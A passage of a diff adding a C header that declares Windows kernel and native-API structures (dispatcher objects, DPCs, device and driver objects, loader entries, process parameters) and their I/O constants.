+			UCHAR TimerType;
+			union {
+				UCHAR TimerControlFlags;
+				struct {
+					UCHAR Absolute : 1;
+					UCHAR Wake : 1;
+					UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;
+				} DUMMYSTRUCTNAME;
+			};
+
+			UCHAR Hand;
+			union {
+				UCHAR TimerMiscFlags;
+				struct {
+
+#if !defined(KENCODED_TIMER_PROCESSOR)
+
+					UCHAR Index : TIMER_EXPIRED_INDEX_BITS;
+
+#else
+
+					UCHAR Index : 1;
+					UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;
+
+#endif
+
+					UCHAR Inserted : 1;
+					volatile UCHAR Expired : 1;
+				} DUMMYSTRUCTNAME;
+			} DUMMYUNIONNAME;
+		} DUMMYSTRUCTNAME2;
+
+		struct {                            // Timer2
+			UCHAR Timer2Type;
+			union {
+				UCHAR Timer2Flags;
+				struct {
+					UCHAR Timer2Inserted : 1;
+					UCHAR Timer2Expiring : 1;
+					UCHAR Timer2CancelPending : 1;
+					UCHAR Timer2SetPending : 1;
+					UCHAR Timer2Running : 1;
+					UCHAR Timer2Disabled : 1;
+					UCHAR Timer2ReservedFlags : 2;
+				} DUMMYSTRUCTNAME;
+			} DUMMYUNIONNAME;
+
+			UCHAR Timer2Reserved1;
+			UCHAR Timer2Reserved2;
+		} DUMMYSTRUCTNAME3;
+
+		struct {                            // Queue
+			UCHAR QueueType;
+			union {
+				UCHAR QueueControlFlags;
+				struct {
+					UCHAR Abandoned : 1;
+					UCHAR DisableIncrement : 1;
+					UCHAR QueueReservedControlFlags : 6;
+				} DUMMYSTRUCTNAME;
+			} DUMMYUNIONNAME;
+
+			UCHAR QueueSize;
+			UCHAR QueueReserved;
+		} DUMMYSTRUCTNAME4;
+
+		struct {                            // Thread
+			UCHAR ThreadType;
+			UCHAR ThreadReserved;
+			union {
+				UCHAR ThreadControlFlags;
+				struct {
+					UCHAR CycleProfiling : 1;
+					UCHAR CounterProfiling : 1;
+					UCHAR GroupScheduling : 1;
+					UCHAR AffinitySet : 1;
+					UCHAR ThreadReservedControlFlags : 4;
+				} DUMMYSTRUCTNAME;
+			} DUMMYUNIONNAME;
+
+			union {
+				UCHAR DebugActive;
+
+#if !defined(_X86_)
+
+				struct {
+					BOOLEAN ActiveDR7 : 1;
+					BOOLEAN Instrumented : 1;
+					BOOLEAN Minimal : 1;
+					BOOLEAN Reserved4 : 3;
+					BOOLEAN UmsScheduled : 1;
+					BOOLEAN UmsPrimary : 1;
+				} DUMMYSTRUCTNAME;
+
+#endif
+
+			} DUMMYUNIONNAME2;
+		} DUMMYSTRUCTNAME5;
+
+		struct {                         // Mutant
+			UCHAR MutantType;
+			UCHAR MutantSize;
+			BOOLEAN DpcActive;
+			UCHAR MutantReserved;
+		} DUMMYSTRUCTNAME6;
+	} DUMMYUNIONNAME;
+
+	LONG SignalState;                   // Object lock
+	LIST_ENTRY WaitListHead;            // Object lock
+} DISPATCHER_HEADER, *PDISPATCHER_HEADER;
+
+typedef struct _KEVENT {
+	DISPATCHER_HEADER Header;
+} KEVENT, *PKEVENT, *PRKEVENT;
+
+typedef struct _KMUTANT {
+	DISPATCHER_HEADER Header;
+	LIST_ENTRY MutantListEntry;
+	struct _KTHREAD *OwnerThread;
+	BOOLEAN Abandoned;
+	UCHAR ApcDisable;
+} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;
+
+typedef struct _KSEMAPHORE {
+	DISPATCHER_HEADER Header;
+	LONG Limit;
+} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;
+
+typedef struct _KTIMER {
+	DISPATCHER_HEADER Header;
+	ULARGE_INTEGER DueTime;
+	LIST_ENTRY TimerListEntry;
+	struct _KDPC *Dpc;
+	ULONG Processor;
+	LONG Period;
+} KTIMER, *PKTIMER, *PRKTIMER;
+
+typedef struct _KDEVICE_QUEUE_ENTRY {
+	LIST_ENTRY DeviceListEntry;
+	ULONG SortKey;
+	BOOLEAN Inserted;
+} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;
+
+typedef enum _KDPC_IMPORTANCE {
+	LowImportance,
+	MediumImportance,
+	HighImportance
+} KDPC_IMPORTANCE;
+
+typedef struct _KDPC {
+	union {
+		ULONG TargetInfoAsUlong;
+		struct {
+			UCHAR Type;
+			UCHAR Importance;
+			volatile USHORT Number;
+		} DUMMYSTRUCTNAME;
+	} DUMMYUNIONNAME;
+
+	SINGLE_LIST_ENTRY DpcListEntry;
+	KAFFINITY ProcessorHistory;
+	PVOID DeferredRoutine;
+	PVOID DeferredContext;
+	PVOID SystemArgument1;
+	PVOID SystemArgument2;
+	__volatile PVOID DpcData;
+} KDPC, *PKDPC, *PRKDPC;
+
+typedef struct _WAIT_CONTEXT_BLOCK {
+	union {
+		KDEVICE_QUEUE_ENTRY WaitQueueEntry;
+		struct {
+			LIST_ENTRY DmaWaitEntry;
+			ULONG NumberOfChannels;
+			ULONG SyncCallback : 1;
+			ULONG DmaContext : 1;
+			ULONG Reserved : 30;
+		};
+	};
+	PVOID DeviceRoutine;
+	PVOID DeviceContext;
+	ULONG NumberOfMapRegisters;
+	PVOID DeviceObject;
+	PVOID CurrentIrp;
+	PKDPC BufferChainingDpc;
+} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;
+
+#define MAXIMUM_VOLUME_LABEL_LENGTH  (32 * sizeof(WCHAR)) // 32 characters
+
+typedef struct _VPB {
+	CSHORT Type;
+	CSHORT Size;
+	USHORT Flags;
+	USHORT VolumeLabelLength; // in bytes
+	struct _DEVICE_OBJECT *DeviceObject;
+	struct _DEVICE_OBJECT *RealDevice;
+	ULONG SerialNumber;
+	ULONG ReferenceCount;
+	WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];
+} VPB, *PVPB;
+
+typedef struct _KQUEUE {
+	DISPATCHER_HEADER Header;
+	LIST_ENTRY EntryListHead;
+	ULONG CurrentCount;
+	ULONG MaximumCount;
+	LIST_ENTRY ThreadListHead;
+} KQUEUE, *PKQUEUE;
+
+typedef struct _KDEVICE_QUEUE {
+	CSHORT Type;
+	CSHORT Size;
+	LIST_ENTRY DeviceListHead;
+	KSPIN_LOCK Lock;
+
+#if defined(_AMD64_)
+
+	union {
+		BOOLEAN Busy;
+		struct {
+			LONG64 Reserved : 8;
+			LONG64 Hint : 56;
+		};
+	};
+
+#else
+
+	BOOLEAN Busy;
+
+#endif
+
+} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;
+
+enum _KOBJECTS {
+	EventNotificationObject = 0x0,
+	EventSynchronizationObject = 0x1,
+	MutantObject = 0x2,
+	ProcessObject = 0x3,
+	QueueObject = 0x4,
+	SemaphoreObject = 0x5,
+	ThreadObject = 0x6,
+	GateObject = 0x7,
+	TimerNotificationObject = 0x8,
+	TimerSynchronizationObject = 0x9,
+	Spare2Object = 0xa,
+	Spare3Object = 0xb,
+	Spare4Object = 0xc,
+	Spare5Object = 0xd,
+	Spare6Object = 0xe,
+	Spare7Object = 0xf,
+	Spare8Object = 0x10,
+	Spare9Object = 0x11,
+	ApcObject = 0x12,
+	DpcObject = 0x13,
+	DeviceQueueObject = 0x14,
+	EventPairObject = 0x15,
+	InterruptObject = 0x16,
+	ProfileObject = 0x17,
+	ThreadedDpcObject = 0x18,
+	MaximumKernelObject = 0x19,
+};
+
+#define DO_VERIFY_VOLUME                0x00000002      // ntddk nthal ntifs wdm
+#define DO_BUFFERED_IO                  0x00000004      // ntddk nthal ntifs wdm
+#define DO_EXCLUSIVE                    0x00000008      // ntddk nthal ntifs wdm
+#define DO_DIRECT_IO                    0x00000010      // ntddk nthal ntifs wdm
+#define DO_MAP_IO_BUFFER                0x00000020      // ntddk nthal ntifs wdm
+#define DO_DEVICE_HAS_NAME              0x00000040      // ntddk nthal ntifs
+#define DO_DEVICE_INITIALIZING          0x00000080      // ntddk nthal ntifs wdm
+#define DO_SYSTEM_BOOT_PARTITION        0x00000100      // ntddk nthal ntifs
+#define DO_LONG_TERM_REQUESTS           0x00000200      // ntddk nthal ntifs
+#define DO_NEVER_LAST_DEVICE            0x00000400      // ntddk nthal ntifs
+#define DO_SHUTDOWN_REGISTERED          0x00000800      // ntddk nthal ntifs wdm
+#define DO_BUS_ENUMERATED_DEVICE        0x00001000      // ntddk nthal ntifs wdm
+#define DO_POWER_PAGABLE                0x00002000      // ntddk nthal ntifs wdm
+#define DO_POWER_INRUSH                 0x00004000      // ntddk nthal ntifs wdm
+#define DO_POWER_NOOP                   0x00008000
+#define DO_LOW_PRIORITY_FILESYSTEM      0x00010000      // ntddk nthal ntifs
+#define DO_XIP                          0x00020000
+
+#define FILE_REMOVABLE_MEDIA                        0x00000001
+#define FILE_READ_ONLY_DEVICE                       0x00000002
+#define FILE_FLOPPY_DISKETTE                        0x00000004
+#define FILE_WRITE_ONCE_MEDIA                       0x00000008
+#define FILE_REMOTE_DEVICE                          0x00000010
+#define FILE_DEVICE_IS_MOUNTED                      0x00000020
+#define FILE_VIRTUAL_VOLUME                         0x00000040
+#define FILE_AUTOGENERATED_DEVICE_NAME              0x00000080
+#define FILE_DEVICE_SECURE_OPEN                     0x00000100
+#define FILE_CHARACTERISTIC_PNP_DEVICE              0x00000800
+#define FILE_CHARACTERISTIC_TS_DEVICE               0x00001000
+#define FILE_CHARACTERISTIC_WEBDAV_DEVICE           0x00002000
+#define FILE_CHARACTERISTIC_CSV                     0x00010000
+#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL    0x00020000
+#define FILE_PORTABLE_DEVICE                        0x00040000
+
+#define FILE_DEVICE_BEEP                0x00000001
+#define FILE_DEVICE_CD_ROM              0x00000002
+#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
+#define FILE_DEVICE_CONTROLLER          0x00000004
+#define FILE_DEVICE_DATALINK            0x00000005
+#define FILE_DEVICE_DFS                 0x00000006
+#define FILE_DEVICE_DISK                0x00000007
+#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
+#define FILE_DEVICE_FILE_SYSTEM         0x00000009
+#define FILE_DEVICE_INPORT_PORT         0x0000000a
+#define FILE_DEVICE_KEYBOARD            0x0000000b
+#define FILE_DEVICE_MAILSLOT            0x0000000c
+#define FILE_DEVICE_MIDI_IN             0x0000000d
+#define FILE_DEVICE_MIDI_OUT            0x0000000e
+#define FILE_DEVICE_MOUSE               0x0000000f
+#define FILE_DEVICE_MULTI_UNC_PROVIDER  0x00000010
+#define FILE_DEVICE_NAMED_PIPE          0x00000011
+#define FILE_DEVICE_NETWORK             0x00000012
+#define FILE_DEVICE_NETWORK_BROWSER     0x00000013
+#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
+#define FILE_DEVICE_NULL                0x00000015
+#define FILE_DEVICE_PARALLEL_PORT       0x00000016
+#define FILE_DEVICE_PHYSICAL_NETCARD    0x00000017
+#define FILE_DEVICE_PRINTER             0x00000018
+#define FILE_DEVICE_SCANNER             0x00000019
+#define FILE_DEVICE_SERIAL_MOUSE_PORT   0x0000001a
+#define FILE_DEVICE_SERIAL_PORT         0x0000001b
+#define FILE_DEVICE_SCREEN              0x0000001c
+#define FILE_DEVICE_SOUND               0x0000001d
+#define FILE_DEVICE_STREAMS             0x0000001e
+#define FILE_DEVICE_TAPE                0x0000001f
+#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
+#define FILE_DEVICE_TRANSPORT           0x00000021
+#define FILE_DEVICE_UNKNOWN             0x00000022
+#define FILE_DEVICE_VIDEO               0x00000023
+#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
+#define FILE_DEVICE_WAVE_IN             0x00000025
+#define FILE_DEVICE_WAVE_OUT            0x00000026
+#define FILE_DEVICE_8042_PORT           0x00000027
+#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
+#define FILE_DEVICE_BATTERY             0x00000029
+#define FILE_DEVICE_BUS_EXTENDER        0x0000002a
+#define FILE_DEVICE_MODEM               0x0000002b
+#define FILE_DEVICE_VDM                 0x0000002c
+#define FILE_DEVICE_MASS_STORAGE        0x0000002d
+#define FILE_DEVICE_SMB                 0x0000002e
+#define FILE_DEVICE_KS                  0x0000002f
+#define FILE_DEVICE_CHANGER             0x00000030
+#define FILE_DEVICE_SMARTCARD           0x00000031
+#define FILE_DEVICE_ACPI                0x00000032
+#define FILE_DEVICE_DVD                 0x00000033
+#define FILE_DEVICE_FULLSCREEN_VIDEO    0x00000034
+#define FILE_DEVICE_DFS_FILE_SYSTEM     0x00000035
+#define FILE_DEVICE_DFS_VOLUME          0x00000036
+#define FILE_DEVICE_SERENUM             0x00000037
+#define FILE_DEVICE_TERMSRV             0x00000038
+#define FILE_DEVICE_KSEC                0x00000039
+#define FILE_DEVICE_FIPS                0x0000003A
+#define FILE_DEVICE_INFINIBAND          0x0000003B
+#define FILE_DEVICE_VMBUS               0x0000003E
+#define FILE_DEVICE_CRYPT_PROVIDER      0x0000003F
+#define FILE_DEVICE_WPD                 0x00000040
+#define FILE_DEVICE_BLUETOOTH           0x00000041
+#define FILE_DEVICE_MT_COMPOSITE        0x00000042
+#define FILE_DEVICE_MT_TRANSPORT        0x00000043
+#define FILE_DEVICE_BIOMETRIC           0x00000044
+#define FILE_DEVICE_PMI                 0x00000045
+#define FILE_DEVICE_EHSTOR              0x00000046
+#define FILE_DEVICE_DEVAPI              0x00000047
+#define FILE_DEVICE_GPIO                0x00000048
+#define FILE_DEVICE_USBEX               0x00000049
+#define FILE_DEVICE_CONSOLE             0x00000050
+#define FILE_DEVICE_NFP                 0x00000051
+#define FILE_DEVICE_SYSENV              0x00000052
+#define FILE_DEVICE_VIRTUAL_BLOCK       0x00000053
+#define FILE_DEVICE_POINT_OF_SERVICE    0x00000054
+
+#define FILE_BYTE_ALIGNMENT             0x00000000
+#define FILE_WORD_ALIGNMENT             0x00000001
+#define FILE_LONG_ALIGNMENT             0x00000003
+#define FILE_QUAD_ALIGNMENT             0x00000007
+#define FILE_OCTA_ALIGNMENT             0x0000000f
+#define FILE_32_BYTE_ALIGNMENT          0x0000001f
+#define FILE_64_BYTE_ALIGNMENT          0x0000003f
+#define FILE_128_BYTE_ALIGNMENT         0x0000007f
+#define FILE_256_BYTE_ALIGNMENT         0x000000ff
+#define FILE_512_BYTE_ALIGNMENT         0x000001ff
+
+#define DPC_NORMAL 0
+#define DPC_THREADED 1
+#define DEVICE_TYPE DWORD
+
+typedef struct _DEVICE_OBJECT {
+	CSHORT                      Type;
+	USHORT                      Size;
+	LONG                        ReferenceCount;
+	struct _DRIVER_OBJECT  *DriverObject;
+	struct _DEVICE_OBJECT  *NextDevice;
+	struct _DEVICE_OBJECT  *AttachedDevice;
+	struct _IRP  *CurrentIrp;
+	PVOID		                Timer;
+	ULONG                       Flags;
+	ULONG                       Characteristics;
+	__volatile PVPB             Vpb;
+	PVOID                       DeviceExtension;
+	DEVICE_TYPE                 DeviceType;
+	CCHAR                       StackSize;
+	union {
+		LIST_ENTRY         ListEntry;
+		WAIT_CONTEXT_BLOCK Wcb;
+	} Queue;
+	ULONG                       AlignmentRequirement;
+	KDEVICE_QUEUE               DeviceQueue;
+	KDPC                        Dpc;
+	ULONG                       ActiveThreadCount;
+	PSECURITY_DESCRIPTOR        SecurityDescriptor;
+	KEVENT                      DeviceLock;
+	USHORT                      SectorSize;
+	USHORT                      Spare1;
+	struct _DEVOBJ_EXTENSION  *  DeviceObjectExtension;
+	PVOID                       Reserved;
+} DEVICE_OBJECT, *PDEVICE_OBJECT;
+
+typedef struct _DEVOBJ_EXTENSION {
+
+	CSHORT          Type;
+	USHORT          Size;
+
+	//
+	// Public part of the DeviceObjectExtension structure
+	//
+
+	PDEVICE_OBJECT  DeviceObject;               // owning device object
+
+	// end_ntddk end_nthal end_ntifs end_wdm end_ntosp
+
+	//
+	// Universal Power Data - all device objects must have this
+	//
+
+	ULONG           PowerFlags;             // see ntos\po\pop.h
+	// WARNING: Access via PO macros
+	// and with PO locking rules ONLY.
+
+	//
+	// Pointer to the non-universal power data
+	//  Power data that only some device objects need is stored in the
+	//  device object power extension -> DOPE
+	//  see po.h
+	//
+
+	struct          _DEVICE_OBJECT_POWER_EXTENSION  *Dope;
+
+	//
+	// power state information
+	//
+
+	//
+	// Device object extension flags.  Protected by the IopDatabaseLock.
+	//
+
+	ULONG ExtensionFlags;
+
+	//
+	// PnP manager fields
+	//
+
+	PVOID           DeviceNode;
+
+	//
+	// AttachedTo is a pointer to the device object that this device
+	// object is attached to.  The attachment chain is now doubly
+	// linked: this pointer and DeviceObject->AttachedDevice provide the
+	// linkage.
+	//
+
+	PDEVICE_OBJECT  AttachedTo;
+
+	//
+	// The next two fields are used to prevent recursion in IoStartNextPacket
+	// interfaces.
+	//
+
+	LONG           StartIoCount;       // Used to keep track of number of pending start ios.
+	LONG           StartIoKey;         // Next startio key
+	ULONG          StartIoFlags;       // Start Io Flags. Need a separate flag so that it can be accessed without locks
+	PVPB           Vpb;                // If not NULL contains the VPB of the mounted volume.
+	// Set in the filesystem's volume device object.
+	// This is a reverse VPB pointer.
+
+	// begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp
+
+} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;
+
+typedef struct _FAST_IO_DISPATCH {
+	ULONG SizeOfFastIoDispatch;
+	PVOID FastIoCheckIfPossible;
+	PVOID FastIoRead;
+	PVOID FastIoWrite;
+	PVOID FastIoQueryBasicInfo;
+	PVOID FastIoQueryStandardInfo;
+	PVOID FastIoLock;
+	PVOID FastIoUnlockSingle;
+	PVOID FastIoUnlockAll;
+	PVOID FastIoUnlockAllByKey;
+	PVOID FastIoDeviceControl;
+	PVOID AcquireFileForNtCreateSection;
+	PVOID ReleaseFileForNtCreateSection;
+	PVOID FastIoDetachDevice;
+	PVOID FastIoQueryNetworkOpenInfo;
+	PVOID AcquireForModWrite;
+	PVOID MdlRead;
+	PVOID MdlReadComplete;
+	PVOID PrepareMdlWrite;
+	PVOID MdlWriteComplete;
+	PVOID FastIoReadCompressed;
+	PVOID FastIoWriteCompressed;
+	PVOID MdlReadCompleteCompressed;
+	PVOID MdlWriteCompleteCompressed;
+	PVOID FastIoQueryOpen;
+	PVOID ReleaseForModWrite;
+	PVOID AcquireForCcFlush;
+	PVOID ReleaseForCcFlush;
+} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
+
+#define IO_TYPE_ADAPTER                 0x00000001
+#define IO_TYPE_CONTROLLER              0x00000002
+#define IO_TYPE_DEVICE                  0x00000003
+#define IO_TYPE_DRIVER                  0x00000004
+#define IO_TYPE_FILE                    0x00000005
+#define IO_TYPE_IRP                     0x00000006
+#define IO_TYPE_MASTER_ADAPTER          0x00000007
+#define IO_TYPE_OPEN_PACKET             0x00000008
+#define IO_TYPE_TIMER                   0x00000009
+#define IO_TYPE_VPB                     0x0000000a
+#define IO_TYPE_ERROR_LOG               0x0000000b
+#define IO_TYPE_ERROR_MESSAGE           0x0000000c
+#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d
+
+#define IRP_MJ_CREATE                   0x00
+#define IRP_MJ_CREATE_NAMED_PIPE        0x01
+#define IRP_MJ_CLOSE                    0x02
+#define IRP_MJ_READ                     0x03
+#define IRP_MJ_WRITE                    0x04
+#define IRP_MJ_QUERY_INFORMATION        0x05
+#define IRP_MJ_SET_INFORMATION          0x06
+#define IRP_MJ_QUERY_EA                 0x07
+#define IRP_MJ_SET_EA                   0x08
+#define IRP_MJ_FLUSH_BUFFERS            0x09
+#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
+#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b
+#define IRP_MJ_DIRECTORY_CONTROL        0x0c
+#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d
+#define IRP_MJ_DEVICE_CONTROL           0x0e
+#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f
+#define IRP_MJ_SHUTDOWN                 0x10
+#define IRP_MJ_LOCK_CONTROL             0x11
+#define IRP_MJ_CLEANUP                  0x12
+#define IRP_MJ_CREATE_MAILSLOT          0x13
+#define IRP_MJ_QUERY_SECURITY           0x14
+#define IRP_MJ_SET_SECURITY             0x15
+#define IRP_MJ_POWER                    0x16
+#define IRP_MJ_SYSTEM_CONTROL           0x17
+#define IRP_MJ_DEVICE_CHANGE            0x18
+#define IRP_MJ_QUERY_QUOTA              0x19
+#define IRP_MJ_SET_QUOTA                0x1a
+#define IRP_MJ_PNP                      0x1b
+#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      
+#define IRP_MJ_MAXIMUM_FUNCTION         0x1b
+
+typedef struct _DRIVER_EXTENSION {
+
+	//
+	// Back pointer to Driver Object
+	//
+
+	struct _DRIVER_OBJECT *DriverObject;
+
+	//
+	// The AddDevice entry point is called by the Plug & Play manager
+	// to inform the driver when a new device instance arrives that this
+	// driver must control.
+	//
+
+	PVOID AddDevice;
+
+	//
+	// The count field is used to count the number of times the driver has
+	// had its registered reinitialization routine invoked.
+	//
+
+	ULONG Count;
+
+	//
+	// The service name field is used by the pnp manager to determine
+	// where the driver related info is stored in the registry.
+	//
+
+	UNICODE_STRING ServiceKeyName;
+
+} DRIVER_EXTENSION, *PDRIVER_EXTENSION;
+
+#define DRVO_UNLOAD_INVOKED             0x00000001
+#define DRVO_LEGACY_DRIVER              0x00000002
+#define DRVO_BUILTIN_DRIVER             0x00000004    // Driver objects for Hal, PnP Mgr
+#define DRVO_REINIT_REGISTERED          0x00000008
+#define DRVO_INITIALIZED                0x00000010
+#define DRVO_BOOTREINIT_REGISTERED      0x00000020
+#define DRVO_LEGACY_RESOURCES           0x00000040
+// end_ntddk end_nthal end_ntifs end_ntosp
+#define DRVO_BASE_FILESYSTEM_DRIVER     0x00000080   // A driver that is at the bottom of the filesystem stack.
+// begin_ntddk begin_nthal begin_ntifs begin_ntosp
+
+typedef struct _DRIVER_OBJECT {
+	CSHORT Type;
+	CSHORT Size;
+
+	//
+	// The following links all of the devices created by a single driver
+	// together on a list, and the Flags word provides an extensible flag
+	// location for driver objects.
+	//
+
+	PDEVICE_OBJECT DeviceObject;
+	ULONG Flags;
+
+	//
+	// The following section describes where the driver is loaded.  The count
+	// field is used to count the number of times the driver has had its
+	// registered reinitialization routine invoked.
+	//
+
+	PVOID DriverStart;
+	ULONG DriverSize;
+	PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY
+	PDRIVER_EXTENSION DriverExtension;
+
+	//
+	// The driver name field is used by the error log thread
+	// determine the name of the driver that an I/O request is/was bound.
+	//
+
+	UNICODE_STRING DriverName;
+
+	//
+	// The following section is for registry support.  Thise is a pointer
+	// to the path to the hardware information in the registry
+	//
+
+	PUNICODE_STRING HardwareDatabase;
+
+	//
+	// The following section contains the optional pointer to an array of
+	// alternate entry points to a driver for "fast I/O" support.  Fast I/O
+	// is performed by invoking the driver routine directly with separate
+	// parameters, rather than using the standard IRP call mechanism.  Note
+	// that these functions may only be used for synchronous I/O, and when
+	// the file is cached.
+	//
+
+	PFAST_IO_DISPATCH FastIoDispatch;
+
+	//
+	// The following section describes the entry points to this particular
+	// driver.  Note that the major function dispatch table must be the last
+	// field in the object so that it remains extensible.
+	//
+
+	PVOID DriverInit;
+	PVOID DriverStartIo;
+	PVOID DriverUnload;
+	PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
+
+} DRIVER_OBJECT;
+typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;
+
+typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	union
+	{
+		LIST_ENTRY InInitializationOrderLinks;
+		LIST_ENTRY InProgressLinks;
+	} DUMMYUNION0;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+	ULONG Flags;
+	WORD ObsoleteLoadCount;
+	WORD TlsIndex;
+	union
+	{
+		LIST_ENTRY HashLinks;
+		struct
+		{
+			PVOID SectionPointer;
+			ULONG CheckSum;
+		};
+	} DUMMYUNION1;
+	union
+	{
+		ULONG TimeDateStamp;
+		PVOID LoadedImports;
+	} DUMMYUNION2;
+	//fields below removed for compatibility
+} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
+
+//typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
+//typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY;
+
+
+/*
+* WDM END
+*/
+
+/*
+*  NTQSI Modules START
+*/
+
+typedef struct _RTL_PROCESS_MODULE_INFORMATION {
+	HANDLE Section;
+	PVOID MappedBase;
+	PVOID ImageBase;
+	ULONG ImageSize;
+	ULONG Flags;
+	USHORT LoadOrderIndex;
+	USHORT InitOrderIndex;
+	USHORT LoadCount;
+	USHORT OffsetToFileName;
+	UCHAR FullPathName[256];
+} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
+
+typedef struct _RTL_PROCESS_MODULES {
+	ULONG NumberOfModules;
+	RTL_PROCESS_MODULE_INFORMATION Modules[1];
+} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
+
+/*
+*	NTQSI Modules END
+*/
+
+/*
+** Virtual Memory START
+*/
+
+typedef enum _MEMORY_INFORMATION_CLASS
+{
+	MemoryBasicInformation,
+	MemoryWorkingSetInformation,
+	MemoryMappedFilenameInformation,
+	MemoryRegionInformation,
+	MemoryWorkingSetExInformation
+} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
+
+typedef struct _MEMORY_REGION_INFORMATION {
+	PVOID AllocationBase;
+	ULONG AllocationProtect;
+	ULONG RegionType;
+	SIZE_T RegionSize;
+} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;
+
+/*
+** Virtual Memory END
+*/
+
+/*
+** System Firmware START
+*/
+
+typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION
+{
+	SystemFirmwareTable_Enumerate,
+	SystemFirmwareTable_Get
+} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;
+
+typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {
+	ULONG ProviderSignature;
+	SYSTEM_FIRMWARE_TABLE_ACTION Action;
+	ULONG TableID;
+	ULONG TableBufferLength;
+	UCHAR TableBuffer[ANYSIZE_ARRAY];
+} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;
+
+/*
+** System Firmware END
+*/
+
+//
+//  PEB/TEB
+//
+//typedef struct _PEB_LDR_DATA
+//{
+//	ULONG Length;
+//	BOOLEAN Initialized;
+//	HANDLE SsHandle;
+//	LIST_ENTRY InLoadOrderModuleList;
+//	LIST_ENTRY InMemoryOrderModuleList;
+//	LIST_ENTRY InInitializationOrderModuleList;
+//	PVOID EntryInProgress;
+//	BOOLEAN ShutdownInProgress;
+//	HANDLE ShutdownThreadId;
+//} PEB_LDR_DATA, *PPEB_LDR_DATA;
+
+typedef struct _GDI_HANDLE_ENTRY
+{
+	union
+	{
+		PVOID Object;
+		PVOID NextFree;
+	};
+	union
+	{
+		struct
+		{
+			USHORT ProcessId;
+			USHORT Lock : 1;
+			USHORT Count : 15;
+		};
+		ULONG Value;
+	} Owner;
+	USHORT Unique;
+	UCHAR Type;
+	UCHAR Flags;
+	PVOID UserPointer;
+} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY;
+
+#define GDI_MAX_HANDLE_COUNT 0x4000
+
+typedef struct _GDI_SHARED_MEMORY
+{
+	GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];
+} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;
+
+#define FLS_MAXIMUM_AVAILABLE 128
+#define TLS_MINIMUM_AVAILABLE 64
+#define TLS_EXPANSION_SLOTS 1024
+
+#define DOS_MAX_COMPONENT_LENGTH 255
+#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
+
+typedef struct _CURDIR
+{
+	UNICODE_STRING DosPath;
+	HANDLE Handle;
+} CURDIR, *PCURDIR;
+
+#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002
+#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003
+
+typedef struct _RTL_DRIVE_LETTER_CURDIR
+{
+	USHORT Flags;
+	USHORT Length;
+	ULONG TimeStamp;
+	STRING DosPath;
+} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
+
+#define RTL_MAX_DRIVE_LETTERS 32
+#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS
+{
+	ULONG MaximumLength;
+	ULONG Length;
+
+	ULONG Flags;
+	ULONG DebugFlags;
+
+	HANDLE ConsoleHandle;
+	ULONG ConsoleFlags;
+	HANDLE StandardInput;
+	HANDLE StandardOutput;
+	HANDLE StandardError;
+
+	CURDIR CurrentDirectory;
+	UNICODE_STRING DllPath;
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+	PVOID Environment;
+
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+
